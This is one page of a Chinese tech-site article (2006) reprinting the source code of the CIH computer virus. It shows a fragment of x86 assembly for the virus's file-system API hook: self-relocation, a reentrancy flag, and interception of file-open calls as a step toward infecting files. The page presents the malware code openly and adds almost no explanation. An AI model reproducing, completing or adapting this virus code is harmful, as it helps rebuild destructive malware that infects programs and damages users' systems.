豆豆网 > 技术应用 > 安全技术 > 杀毒技术 > 病毒理论 > 正文

CIH源代码

http://tech.ddvip.com 2006年04月03日社区交流收藏本文

关键字： SRENG 后门病毒磁碟机 ARP Byshell PSW.Win32

本文详细介绍CIH源代码

　　OldInstallFileSystemApiHook dd ?

　　; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************

　　; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************

　　FileSystemApiHook:
@3 = FileSystemApiHook

　　pushad

　　call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDataStartAdd
ss
add esi, VirusGameDataStartAddress-@5

　　; *************************************
; * Is OnBusy !? *
; *************************************

　　test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc

　　; *************************************
; * Is OpenFile !? *
; *************************************

　　; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook

　　; *************************************
; * Enable OnBusy *
; *************************************

　　inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy

　　; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************

上一页 3 4 5 678 9 10 11 12 下一页

责编：豆豆技术应用

点击发表评论

正在加载评论...

杀毒技术分类

杀毒技术专题